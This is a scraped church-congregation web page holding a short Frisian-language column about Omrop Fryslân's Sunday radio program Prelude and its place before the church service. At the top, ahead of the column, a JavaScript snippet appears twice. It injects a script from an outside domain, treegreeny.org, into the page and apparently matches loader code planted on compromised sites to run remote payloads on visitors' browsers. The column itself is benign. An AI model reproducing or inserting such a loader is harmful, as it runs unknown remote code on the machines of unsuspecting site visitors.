;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Prelude - PKN Damwâld

Prelude

Gepubliceerd op: woensdag 23 augustus 2023

Sneintemoarns lústerje wy gauris nei Prelude, it fersyk-platen-programma fan Omrop Fryslân.  Tusken 8 en 9 oere bin der mear as 50.000 minsken dy’t  ôfstimd bin op de Omrop en lústerje nei allerhande geastlike muzyk, fan Leonard Cohen oan’t Ritske Numan en in soad koormuziek.

Prelude bestjut faaks;  in oanrin , in opmaat nei in grutter muzykstik of concert.  It programma Prelude is foar in soad minsken de opmaat nei it hichte-punt fan de snein, de tsjerketsjinst.  Yn sporttermen soene jo it de warming-up neame; oefeningen dwaan foar de wedstryd, it hichtepunt foar in sporter.

In koarte oertinking fan amper fiif minuten (!!!), mar likegoed mei in dúdlik boadskip, makket diel út fan it muzyk-oerke.   Foar in grutte groep minsken dy’t net (mear) nei de tsjerke kin (of wol) is’t sadwaande net in prelude ofwol in warming-up, mar tagelyk it hichtepunt fan de snein! Mooi sa’n programma, mei in soad omtinken foar minsken dy’t wat te fieren ha, of just net,want wat bin der in protte minsken dy’t ferlet ha fan in bemoediging, of in skouderklopke !

Yn de sport komt de term cooling-down der ek nog by; nei in wedstriid it lichem ta rest komme litte; dat dogge wy ek…, want faaks lizze we toch nog op bed…!

 

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns